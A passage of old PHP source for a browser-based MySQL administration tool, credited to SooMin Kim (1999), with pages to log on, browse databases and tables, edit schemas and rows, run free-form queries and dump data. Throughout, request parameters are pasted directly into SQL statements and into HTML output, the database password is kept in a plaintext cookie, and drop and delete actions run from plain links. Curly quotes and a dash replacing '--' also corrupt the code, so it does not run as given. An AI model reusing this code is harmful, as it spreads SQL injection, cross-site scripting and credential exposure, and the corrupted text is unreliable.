global $PHP_SELF;

setcookie( “mysql_web_admin_username” );
setcookie( “mysql_web_admin_password” );
echo “<html>\n”;
echo “<head>\n”;
echo “<title>MySQL Web Interface</title>\n”;
echo “</head>\n”;
echo “<body>\n”;
echo “<table width=100% height=100%><tr><td><center>\n”;
echo “<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n”;
echo “<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n”;
echo “<h1>MySQL Web Interface</h1>\n”;
echo “<form action=’$PHP_SELF’>\n”;
echo “<input type=hidden name=action value=logon_submit>\n”;
echo “<table cellpadding=5 cellspacing=1>\n”;
echo “<tr><td>Username </td><td> <input type=text
name=username></td></tr>\n”;
echo “<tr><td>Password </td><td> <input type=password
name=password></td></tr>\n”;
echo “</table><p>\n”;
echo “<input type=submit value=’Enter’>\n”;
echo “<input type=reset value=’Clear’><br>\n”;
echo “</form>\n”;
echo “</center></td></tr></table>\n”;
echo “</center></td></tr></table>\n”;
echo “<p><hr width=300>\n”;
echo “<font size=2>\n”;
echo “Copyleft &copy; since 1999,\n”;
echo “<a href=’mailto:smkim76@icqmail.com’>SooMin Kim</a><br>\n”;
echo “<a href=’http://popeye.snu.ac.kr/~smkim/mysql’>Hompage<a> is
available<br>”;
echo “</font>\n”;
echo “</center></td></tr></table>\n”;
echo “</body>\n”;
echo “</html>\n”;
}

function logon_submit() {
global $username, $password, $PHP_SELF;

setcookie( “mysql_web_admin_username”, $username );
setcookie( “mysql_web_admin_password”, $password );
echo “<html>”;
echo “<head>”;
echo “<META HTTP-EQUIV=Refresh CONTENT=’0;
URL=$PHP_SELF?action=listDBs’>”;
echo “</head>”;
echo “</html>”;
}

function echoQueryResult() {
global $queryStr, $errMsg;

if( $errMsg == “” ) $errMsg = “Success”;
if( $queryStr != “” ) {
echo “<table cellpadding=5>\n”;
echo “<tr><td>Query</td><td>$queryStr</td></tr>\n”;
echo “<tr><td>Result</td><td>$errMsg</td></tr>\n”;
echo “</table><p>\n”;
}
}

function listDatabases() {
global $mysqlHandle, $PHP_SELF;

echo “<h1>Database List</h1>\n”;

echo “<form action=’$PHP_SELF’>\n”;
echo “<input type=hidden name=action value=createDB>\n”;
echo “<input type=text name=dbname>\n”;
echo “<input type=submit value=’Create Database’>\n”;
echo “</form>\n”;
echo “<hr>\n”;

echo “<table cellspacing=1 cellpadding=5>\n”;

$pDB = mysql_list_dbs( $mysqlHandle );
$num = mysql_num_rows( $pDB );
for( $i = 0; $i < $num; $i++ ) {
$dbname = mysql_dbname( $pDB, $i );
echo “<tr>\n”;
echo “<td>$dbname</td>\n”;
echo “<td><a
href=’$PHP_SELF?action=listTables&dbname=$dbname’>Table</a></td>\n”;
echo “<td><a href=’$PHP_SELF?action=dropDB&dbname=$dbname’
onClick=\”return confirm(‘Drop Database
\’$dbname\’?’)\”>Drop</a></td>\n”;
echo “<td><a
href=’$PHP_SELF?action=dumpDB&dbname=$dbname’>Dump</a></td>\n”;
echo “</tr>\n”;
}
echo “</table>\n”;
}

function createDatabase() {
global $mysqlHandle, $dbname, $PHP_SELF;

mysql_create_db( $dbname, $mysqlHandle );
listDatabases();
}

function dropDatabase() {
global $mysqlHandle, $dbname, $PHP_SELF;

mysql_drop_db( $dbname, $mysqlHandle );
listDatabases();
}

function listTables() {
global $mysqlHandle, $dbname, $PHP_SELF;

echo “<h1>Table List</h1>\n”;
echo “<p class=location>$dbname</p>\n”;
echoQueryResult();
echo “<form action=’$PHP_SELF’>\n”;
echo “<input type=hidden name=action value=createTable>\n”;
echo “<input type=hidden name=dbname value=$dbname>\n”;
echo “<input type=text name=tablename>\n”;
echo “<input type=submit value=’Create Table’>\n”;
echo “</form>\n”;
echo “<form action=’$PHP_SELF’>\n”;
echo “<input type=hidden name=action value=query>\n”;
echo “<input type=hidden name=dbname value=$dbname>\n”;
echo “<input type=text size=40 name=queryStr>\n”;
//echo “<textarea cols=30 rows=3 name=queryStr></textarea><br>”;
echo “<input type=submit value=’Query’>\n”;
echo “</form>\n”;
echo “<hr>\n”;

$pTable = mysql_list_tables( $dbname );

if( $pTable == 0 ) {
$msg = mysql_error();
echo “<h3>Error : $msg</h3><p>\n”;
return;
}
$num = mysql_num_rows( $pTable );

echo “<table cellspacing=1 cellpadding=5>\n”;

for( $i = 0; $i < $num; $i++ ) {
$tablename = mysql_tablename( $pTable, $i );

echo “<tr>\n”;
echo “<td>\n”;
echo “$tablename\n”;
echo “</td>\n”;
echo “<td>\n”;
echo “<a
href=’$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename’>Schema</a>\n”;
echo “</td>\n”;
echo “<td>\n”;
echo “<a
href=’$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename’>Data</a>\n”;
echo “</td>\n”;
echo “<td>\n”;
echo “<a
href=’$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename’
onClick=\”return confirm(‘Drop Database \’$dbname\’?’)\”>Drop</a>\n”;
echo “</td>\n”;
echo “<td>\n”;
echo “<a
href=’$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename’>Dump</a>\n”;
echo “</td>\n”;
echo “</tr>\n”;
}

echo “</table>”;
}

function createTable() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr,
$errMsg;

$queryStr = “CREATE TABLE $tablename ( no INT )”;
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();

listTables();
}

function dropTable() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr,
$errMsg;

$queryStr = “DROP TABLE $tablename”;
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();

listTables();
}

function viewSchema() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr,
$errMsg;

echo “<h1>Table Schema</h1>\n”;
echo “<p class=location>$dbname &gt; $tablename</p>\n”;

echoQueryResult();

echo “<a
href=’$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename’>Add
Field</a> | \n”;
echo “<a
href=’$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename’>View
Data</a>\n”;
echo “<hr>\n”;

$pResult = mysql_db_query( $dbname, “SHOW fields FROM $tablename” );
$num = mysql_num_rows( $pResult );

echo “<table cellspacing=1 cellpadding=5>\n”;
echo “<tr>\n”;
echo “<th>Field</th>\n”;
echo “<th>Type</th>\n”;
echo “<th>Null</th>\n”;
echo “<th>Key</th>\n”;
echo “<th>Default</th>\n”;
echo “<th>Extra</th>\n”;
echo “<th colspan=2>Action</th>\n”;
echo “</tr>\n”;

for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_array( $pResult );
echo “<tr>\n”;
echo “<td>”.$field[“Field”].”</td>\n”;
echo “<td>”.$field[“Type”].”</td>\n”;
echo “<td>”.$field[“Null”].”</td>\n”;
echo “<td>”.$field[“Key”].”</td>\n”;
echo “<td>”.$field[“Default”].”</td>\n”;
echo “<td>”.$field[“Extra”].”</td>\n”;
$fieldname = $field[“Field”];
echo “<td><a
href=’$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname’>Edit</a></td>\n”;
echo “<td><a
href=’$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname’
onClick=\”return confirm(‘Drop Field
\’$fieldname\’?’)\”>Drop</a></td>\n”;
echo “</tr>\n”;
}
echo “</table>\n”;
}

function manageField( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;

if( $cmd == “add” )
echo “<h1>Add Field</h1>\n”;
else if( $cmd == “edit” ) {
echo “<h1>Edit Field</h1>\n”;
$pResult = mysql_db_query( $dbname, “SHOW fields FROM $tablename” );
$num = mysql_num_rows( $pResult );
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_array( $pResult );
if( $field[“Field”] == $fieldname ) {
$fieldtype = $field[“Type”];
$fieldkey = $field[“Key”];
$fieldextra = $field[“Extra”];
$fieldnull = $field[“Null”];
$fielddefault = $field[“Default”];
break;
}
}
$type = strtok( $fieldtype, ” (,)\n” );
if( strpos( $fieldtype, “(” ) ) {
if( $type == “enum” | $type == “set” ) {
$valuelist = strtok( ” ()\n” );
} else {
$M = strtok( ” (,)\n” );
if( strpos( $fieldtype, “,” ) )
$D = strtok( ” (,)\n” );
}
}
}

echo “<p class=location>$dbname &gt; $tablename</p>\n”;
echo “<form action=$PHP_SELF>\n”;

if( $cmd == “add” )
echo “<input type=hidden name=action value=addField_submit>\n”;
else if( $cmd == “edit” ) {
echo “<input type=hidden name=action value=editField_submit>\n”;
echo “<input type=hidden name=old_name value=$fieldname>\n”;
}
echo “<input type=hidden name=dbname value=$dbname>\n”;
echo “<input type=hidden name=tablename value=$tablename>\n”;

echo “<h3>Name</h3>\n”;
echo “<input type=text name=name value=$fieldname><p>\n”;
?>

<h3>Type</h3>

<font size=2>
* `M’ indicates the maximum display size.<br>
* `D’ applies to floating-point types and indicates the number of
digits
following the decimal point.<br>
</font>

<table>
<tr>
<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
</tr>
<tr>
<td><input type=radio name=type value=”TINYINT” <? if( $type ==
“tinyint” )
echo “checked”;?>>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”SMALLINT” <? if( $type ==
“smallint”
) echo “checked”;?>>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”MEDIUMINT” <? if( $type ==
“mediumint” ) echo “checked”;?>>MEDIUMINT (-8388608 ~ 8388607)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”INT” <? if( $type == “int” )
echo
“checked”;?>>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”BIGINT” <? if( $type == “bigint”
)
echo “checked”;?>>BIGINT (-9223372036854775808 ~
9223372036854775807)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”FLOAT” <? if( $type == “float” )
echo
“checked”;?>>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”DOUBLE” <? if( $type == “double”
)
echo “checked”;?>>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”DECIMAL” <? if( $type ==
“decimal” )
echo “checked”;?>>DECIMAL(NUMERIC)</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”DATE” <? if( $type == “date” )
echo
“checked”;?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”DATETIME” <? if( $type ==
“datetime”
) echo “checked”;?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31
23:59:59,
YYYY-MM-DD HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”TIMESTAMP” <? if( $type ==
“timestamp” ) echo “checked”;?>>TIMESTAMP (1970-01-01 00:00:00 ~
2106…,
YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”TIME” <? if( $type == “time” )
echo
“checked”;?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”YEAR” <? if( $type == “year” )
echo
“checked”;?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”CHAR” <? if( $type == “char” )
echo
“checked”;?>>CHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value=”VARCHAR” <? if( $type ==
“varchar” )
echo “checked”;?>>VARCHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value=”TINYTEXT” <? if( $type ==
“tinytext”
) echo “checked”;?>>TINYTEXT (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”TEXT” <? if( $type == “text” )
echo
“checked”;?>>TEXT (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”MEDIUMTEXT” <? if( $type ==
“mediumtext” ) echo “checked”;?>>MEDIUMTEXT (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”LONGTEXT” <? if( $type ==
“longtext”
) echo “checked”;?>>LONGTEXT (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”TINYBLOB” <? if( $type ==
“tinyblob”
) echo “checked”;?>>TINYBLOB (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”BLOB” <? if( $type == “blob” )
echo
“checked”;?>>BLOB (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”MEDIUMBLOB” <? if( $type ==
“mediumblob” ) echo “checked”;?>>MEDIUMBLOB (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”LONGBLOB” <? if( $type ==
“longblob”
) echo “checked”;?>>LONGBLOB (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value=”ENUM” <? if( $type == “enum” )
echo
“checked”;?>>ENUM</td>
<td colspan=5><center>value list</center></td>
</tr>
<tr>
<td><input type=radio name=type value=”SET” <? if( $type == “set” )
echo
“checked”;?>>SET</td>
<td colspan=5><center>value list</center></td>
</tr>

</table>
<table>
<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value
list (ex: ‘apple’, ‘orange’, ‘banana’) </th></tr>
<tr>
<td align=center><input type=text size=4 name=M <? if( $M != “” ) echo
“value=$M”;?>></td>
<td align=center><input type=text size=4 name=D <? if( $D != “” ) echo
“value=$D”;?>></td>
<td align=center><input type=checkbox name=unsigned value=”UNSIGNED” <?
if(
strpos( $fieldtype, “unsigned” ) ) echo “checked”;?>></td>
<td align=center><input type=checkbox name=zerofill value=”ZEROFILL” <?
if(
strpos( $fieldtype, “zerofill” ) ) echo “checked”;?>></td>
<td align=center><input type=checkbox name=binary value=”BINARY” <? if(
strpos( $fieldtype, “binary” ) ) echo “checked”;?>></td>
<td align=center><input type=text size=60 name=valuelist <? if(
$valuelist
!= “” ) echo “value=\”$valuelist\””;?>></td>
</tr>
</table>
<h3>Flags</h3>
<table>
<tr><th>not null</th><th>default value</th><th>auto
increment</th><th>primary key</th></tr>
<tr>
<td align=center><input type=checkbox name=not_null value=”NOT NULL” <?
if(
$fieldnull != “YES” ) echo “checked”;?>></td>
<td align=center><input type=text name=default_value <? if(
$fielddefault !=
“” ) echo “value=$fielddefault”;?>></td>
<td align=center><input type=checkbox name=auto_increment
value=”AUTO_INCREMENT” <? if( $fieldextra == “auto_increment” ) echo
“checked”;?>></td>
<td align=center><input type=checkbox name=primary_key value=”PRIMARY
KEY”
<? if( $fieldkey == “PRI” ) echo “checked”;?>></td>
</tr>
</table>

<p>

<?
if( $cmd == “add” )
echo “<input type=submit value=’Add Field’>\n”;
else if( $cmd == “edit” )
echo “<input type=submit value=’Edit Field’>\n”;
echo “<input type=button value=Cancel onClick=’history.back()’>\n”;
echo “</form>\n”;
}

function manageField_submit( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type,
$PHP_SELF, $queryStr, $errMsg,
$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value,
$auto_increment, $primary_key, $valuelist;

if( $cmd == “add” )
$queryStr = “ALTER TABLE $tablename ADD $name “;
else if( $cmd == “edit” )
$queryStr = “ALTER TABLE $tablename CHANGE $old_name $name “;

if( $M != “” )
if( $D != “” )
$queryStr .= “$type($M,$D) “;
else
$queryStr .= “$type($M) “;
else if( $valuelist != “” ) {
$valuelist = stripslashes( $valuelist );
$queryStr .= “$type($valuelist) “;
} else
$queryStr .= “$type “;

$queryStr .= “$unsigned $zerofill $binary “;

if( $default_value != “” )
$queryStr .= “DEFAULT ‘$default_value’ “;

$queryStr .= “$not_null $auto_increment”;

mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();

// key change
$keyChange = false;
$result = mysql_query( “SHOW KEYS FROM $tablename” );
$primary = “”;
while( $row = mysql_fetch_array($result) )
if( $row[“Key_name”] == “PRIMARY” ) {
if( $row[Column_name] == $name )
$keyChange = true;
else
$primary .= “, $row[Column_name]”;
}
if( $primary_key == “PRIMARY KEY” ) {
$primary .= “, $name”;
$keyChange = !$keyChange;
}
$primary = substr( $primary, 2 );
if( $keyChange == true ) {
$q = “ALTER TABLE $tablename DROP PRIMARY KEY”;
mysql_query( $q );
$queryStr .= “<br>\n” . $q;
$errMsg .= “<br>\n” . mysql_error();
$q = “ALTER TABLE $tablename ADD PRIMARY KEY( $primary )”;
mysql_query( $q );
$queryStr .= “<br>\n” . $q;
$errMsg .= “<br>\n” . mysql_error();
}

viewSchema();
}

function dropField() {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF,
$queryStr,
$errMsg;

$queryStr = “ALTER TABLE $tablename DROP COLUMN $fieldname”;
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr , $mysqlHandle );
$errMsg = mysql_error();

viewSchema();
}

function viewData( $queryStr ) {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page,
$rowperpage, $orderby;

echo “<h1>Data in Table</h1>\n”;
if( $tablename != “” )
echo “<p class=location>$dbname &gt; $tablename</p>\n”;
else
echo “<p class=location>$dbname</p>\n”;

$queryStr = stripslashes( $queryStr );
if( $queryStr == “” ) {
$queryStr = “SELECT * FROM $tablename”;
if( $orderby != “” )
$queryStr .= ” ORDER BY $orderby”;
echo “<a
href=’$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename’>Add
Data</a> | \n”;
echo “<a
href=’$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename’>Schema</a>\n”;
}

$pResult = mysql_db_query( $dbname, $queryStr );
$errMsg = mysql_error();

$GLOBALS[queryStr] = $queryStr;

if( $pResult == false ) {
echoQueryResult();
return;
}
if( $pResult == 1 ) {
$errMsg = “Success”;
echoQueryResult();
return;
}

echo “<hr>\n”;

$row = mysql_num_rows( $pResult );
$col = mysql_num_fields( $pResult );

if( $row == 0 ) {
echo “No Data Exist!”;
return;
}

if( $rowperpage == “” ) $rowperpage = 20;
if( $page == “” ) $page = 0;
else $page–;
mysql_data_seek( $pResult, $page * $rowperpage );

echo “<table cellspacing=1 cellpadding=2>\n”;
echo “<tr>\n”;
for( $i = 0; $i < $col; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
echo “<th>”;
echo “<a
href=’$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=”.$field->name.”‘>”.$field->name.”</a>\n”;
echo “</th>\n”;
}
echo “<th colspan=2>Action</th>\n”;
echo “</tr>\n”;

for( $i = 0; $i < $rowperpage; $i++ ) {
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
echo “<tr>\n”;
$key = “”;
for( $j = 0; $j < $col; $j++ ) {
$data = $rowArray[$j];

$field = mysql_fetch_field( $pResult, $j );
if( $field->primary_key == 1 )
$key .= “&” . $field->name . “=” . $data;

if( strlen( $data ) > 20 )
$data = substr( $data, 0, 20 ) . “…”;
$data = htmlspecialchars( $data );
echo “<td>\n”;
echo “$data\n”;
echo “</td>\n”;
}

if( $key == “” )
echo “<td colspan=2>no Key</td>\n”;
else {
echo “<td><a
href=’$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key’>Edit</a></td>\n”;
echo “<td><a
href=’$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key’
onClick=\”return confirm(‘Delete Row?’)\”>Delete</a></td>\n”;
}
echo “</tr>\n”;
}
echo “</table>\n”;

echo “<font size=2>\n”;
echo “<form
action=’$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename’
method=post>\n”;
echo “<font color=green>\n”;
echo ($page+1).”/”.(int)($row/$rowperpage+1).” page”;
echo “</font>\n”;
echo ” | “;
if( $page > 0 ) {
echo “<a
href=’$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=”.($page);
if( $orderby != “” )
echo “&orderby=$orderby”;
echo “‘>Prev</a>\n”;
} else
echo “Prev”;
echo ” | “;
if( $page < ($row/$rowperpage)-1 ) {
echo “<a
href=’$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=”.($page+2);
if( $orderby != “” )
echo “&orderby=$orderby”;
echo “‘>Next</a>\n”;
} else
echo “Next”;
echo ” | “;
if( $row > $rowperpage ) {
echo “<input type=text size=4 name=page>\n”;
echo “<input type=submit value=’Go’>\n”;
}
echo “</form>\n”;
echo “</font>\n”;
}

function manageData( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF;

if( $cmd == “add” )
echo “<h1>Add Data</h1>\n”;
else if( $cmd == “edit” ) {
echo “<h1>Edit Data</h1>\n”;
$pResult = mysql_list_fields( $dbname, $tablename );
$num = mysql_num_fields( $pResult );

$key = “”;
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
$key .= $field->name . “=” . $GLOBALS[$field->name] . ” AND “;
else
$key .= $field->name . “='” . $GLOBALS[$field->name] . “‘ AND “;
}
$key = substr( $key, 0, strlen($key)-4 );

mysql_select_db( $dbname, $mysqlHandle );
$pResult = mysql_query( $queryStr = “SELECT * FROM $tablename WHERE
$key”, $mysqlHandle );
$data = mysql_fetch_array( $pResult );
}

echo “<p class=location>$dbname &gt; $tablename</p>\n”;

echo “<form action=’$PHP_SELF’ method=post>\n”;
if( $cmd == “add” )
echo “<input type=hidden name=action value=addData_submit>\n”;
else if( $cmd == “edit” )
echo “<input type=hidden name=action value=editData_submit>\n”;
echo “<input type=hidden name=dbname value=$dbname>\n”;
echo “<input type=hidden name=tablename value=$tablename>\n”;
echo “<table cellspacing=1 cellpadding=2>\n”;
echo “<tr>\n”;
echo “<th>Name</th>\n”;
echo “<th>Type</th>\n”;
echo “<th>Function</th>\n”;
echo “<th>Data</th>\n”;
echo “</tr>\n”;

$pResult = mysql_db_query( $dbname, “SHOW fields FROM $tablename” );
$num = mysql_num_rows( $pResult );

$pResultLen = mysql_list_fields( $dbname, $tablename );

for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_array( $pResult );
$fieldname = $field[“Field”];
$fieldtype = $field[“Type”];
$len = mysql_field_len( $pResultLen, $i );

echo “<tr>”;
echo “<td>$fieldname</td>”;
echo “<td>”.$field[“Type”].”</td>”;
echo “<td>\n”;
echo “<select name=${fieldname}_function>\n”;
echo “<option>\n”;
echo “<option>ASCII\n”;
echo “<option>CHAR\n”;
echo “<option>SOUNDEX\n”;
echo “<option>CURDATE\n”;
echo “<option>CURTIME\n”;
echo “<option>FROM_DAYS\n”;
echo “<option>FROM_UNIXTIME\n”;
echo “<option>NOW\n”;
echo “<option>PASSWORD\n”;
echo “<option>PERIOD_ADD\n”;
echo “<option>PERIOD_DIFF\n”;
echo “<option>TO_DAYS\n”;
echo “<option>USER\n”;
echo “<option>WEEKDAY\n”;
echo “<option>RAND\n”;
echo “</select>\n”;
echo “</td>\n”;
$value = htmlspecialchars($data[$i]);
if( $cmd == “add” ) {
$type = strtok( $fieldtype, ” (,)\n” );
if( $type == “enum” || $type == “set” ) {
echo “<td>\n”;
if( $type == “enum” )
echo “<select name=$fieldname>\n”;
else if( $type == “set” )
echo “<select name=$fieldname size=4 multiple>\n”;
echo strtok( “‘” );
while( $str = strtok( “‘” ) ) {
echo “<option>$str\n”;
strtok( “‘” );
}
echo “</select>\n”;
echo “</td>\n”;
} else {
if( $len < 40 )
echo “<td><input type=text size=40 maxlength=$len
name=$fieldname></td>\n”;
else
echo “<td><textarea cols=40 rows=3 maxlength=$len
name=$fieldname></textarea>\n”;
}
} else if( $cmd == “edit” ) {
$type = strtok( $fieldtype, ” (,)\n” );
if( $type == “enum” || $type == “set” ) {
echo “<td>\n”;
if( $type == “enum” )
echo “<select name=$fieldname>\n”;
else if( $type == “set” )
echo “<select name=$fieldname size=4 multiple>\n”;
echo strtok( “‘” );
while( $str = strtok( “‘” ) ) {
if( $value == $str )
echo “<option selected>$str\n”;
else
echo “<option>$str\n”;
strtok( “‘” );
}
echo “</select>\n”;
echo “</td>\n”;
} else {
if( $len < 40 )
echo “<td><input type=text size=40 maxlength=$len name=$fieldname
value=\”$value\”></td>\n”;
else
echo “<td><textarea cols=40 rows=3 maxlength=$len
name=$fieldname>$value</textarea>\n”;
}
}
echo “</tr>”;
}
echo “</table><p>\n”;
if( $cmd == “add” )
echo “<input type=submit value=’Add Data’>\n”;
else if( $cmd == “edit” )
echo “<input type=submit value=’Edit Data’>\n”;
echo “<input type=button value=’Cancel’ onClick=’history.back()’>\n”;
echo “</form>\n”;
}

function manageData_submit( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF,
$queryStr,
$errMsg;

$pResult = mysql_list_fields( $dbname, $tablename );
$num = mysql_num_fields( $pResult );

mysql_select_db( $dbname, $mysqlHandle );
if( $cmd == “add” )
$queryStr = “INSERT INTO $tablename VALUES (“;
else if( $cmd == “edit” )
$queryStr = “REPLACE INTO $tablename VALUES (“;
for( $i = 0; $i < $num-1; $i++ ) {
$field = mysql_fetch_field( $pResult );
$func = $GLOBALS[$field->name.”_function”];
if( $func != “” )
$queryStr .= ” $func(“;
if( $field->numeric == 1 ) {
$queryStr .= $GLOBALS[$field->name];
if( $func != “” )
$queryStr .= “),”;
else
$queryStr .= “,”;
} else {
$queryStr .= “‘” . $GLOBALS[$field->name];
if( $func != “” )
$queryStr .= “‘),”;
else
$queryStr .= “‘,”;
}
}
$field = mysql_fetch_field( $pResult );
if( $field->numeric == 1 )
$queryStr .= $GLOBALS[$field->name] . “)”;
else
$queryStr .= “‘” . $GLOBALS[$field->name] . “‘)”;

mysql_query( $queryStr , $mysqlHandle );
$errMsg = mysql_error();

viewData( “” );
}

function deleteData() {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF,
$queryStr,
$errMsg;

$pResult = mysql_list_fields( $dbname, $tablename );
$num = mysql_num_fields( $pResult );

$key = “”;
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
$key .= $field->name . “=” . $GLOBALS[$field->name] . ” AND “;
else
$key .= $field->name . “='” . $GLOBALS[$field->name] . “‘ AND “;
}
$key = substr( $key, 0, strlen($key)-4 );

mysql_select_db( $dbname, $mysqlHandle );
$queryStr = “DELETE FROM $tablename WHERE $key”;
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();

viewData( “” );
}

function dump() {
global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;

if( $action == “dumpTable” )
$filename = $tablename;
else
$filename = $dbname;

header(“Content-disposition: filename=$filename.sql”);
header(“Content-type: application/octetstream”);
header(“Pragma: no-cache”);
header(“Expires: 0”);

$pResult = mysql_query( “show variables” );
while( 1 ) {
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
if( $rowArray[0] == “basedir” )
